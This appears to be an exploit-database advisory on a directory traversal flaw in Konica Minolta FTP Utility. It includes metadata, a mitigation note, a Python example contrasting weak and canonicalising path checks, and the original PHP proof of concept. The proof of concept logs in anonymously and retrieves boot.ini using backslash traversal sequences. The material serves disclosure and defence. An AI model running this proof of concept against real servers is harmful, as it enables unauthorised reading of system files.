vendor: FTP Utility
by: shinnai
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: FTP Utility
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:konica_minolta:ftp_utility
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Konica Minolta FTP Utility directory traversal vulnerability

A directory traversal vulnerability exists in Konica Minolta FTP Utility that allows an attacker to read arbitrary files on the vulnerable system. The application does not properly validate user-supplied path input, so a request can traverse the directory structure and read files outside of the intended FTP directory. The vulnerability can be exploited by sending a specially crafted FTP request containing directory traversal sequences (e.g. '../' or, as in the proof of concept below, '..\') to the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
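The following is an added example, not part of the original advisory and not the vendor's code. It contrasts a filter that blocks only '../' with a check that canonicalises the requested path under Windows rules and confirms it stays inside the FTP root. The root `C:\ftproot` and all function names are assumptions made for illustration.

```python
import ntpath  # Windows path semantics, importable on any OS

FTP_ROOT = r"C:\ftproot"            # assumed share root for this example
POC_PATH = "..\\" * 8 + "boot.ini"  # same path the PoC on this page requests


def naive_resolve(root, requested):
    """Weak check: rejects only the forward-slash form '../'."""
    if "../" in requested:
        raise PermissionError("traversal rejected: " + requested)
    return ntpath.normpath(ntpath.join(root, requested))


def safe_resolve(root, requested):
    """Canonicalise the request, then require the result to stay under root."""
    root = ntpath.normcase(ntpath.normpath(root))
    # Treat every client path as relative to the virtual root: unify the
    # separators, then drop any drive/UNC prefix and leading separators.
    _, tail = ntpath.splitdrive(requested.replace("/", "\\"))
    joined = ntpath.join(root, tail.lstrip("\\"))
    candidate = ntpath.normcase(ntpath.normpath(joined))
    if candidate != root and not candidate.startswith(root + "\\"):
        raise PermissionError("outside FTP root: " + requested)
    return candidate


def outcome(resolver, requested, root=FTP_ROOT):
    """Return the path the server would open, or 'REJECTED'."""
    try:
        return resolver(root, requested)
    except PermissionError:
        return "REJECTED"


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, three escaping the root.
    for path in ("docs/scan001.pdf", "../boot.ini", POC_PATH, r"C:\boot.ini"):
        print(f"{path!r}")
        print(f"    naive: {outcome(naive_resolve, path)}")
        print(f"    safe:  {outcome(safe_resolve, path)}")
```

The naive filter passes the backslash form and a drive-qualified path straight through to `C:\boot.ini`, while the canonicalising check rejects the traversal and re-roots the drive-qualified request under the share.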

Exploit-DB raw data:

/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/

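<?php
   // Host running the FTP Utility under test. The original PoC never sets this
   // variable; the value below is a placeholder (documentation address).
   $ftp_server = '192.0.2.10';

   // Local file the retrieved content is written to.
   $local_file = 'boot.ini.txt';
   // Requested path: backslash '..' segments walk up from the FTP root.
   $server_file = '..\..\..\..\..\..\..\..\boot.ini';

   $conn_id = ftp_connect($ftp_server);
   $login_result = ftp_login($conn_id, "anonymous", "anonymous");

   // ftp_get() returns true when the server delivers the requested file.
   if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
     echo "Successfully written to $local_file\n";
   } else {
     echo "There was a problem\n";
   }
   ftp_close($conn_id);
?>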
---------------------------------------------------------------------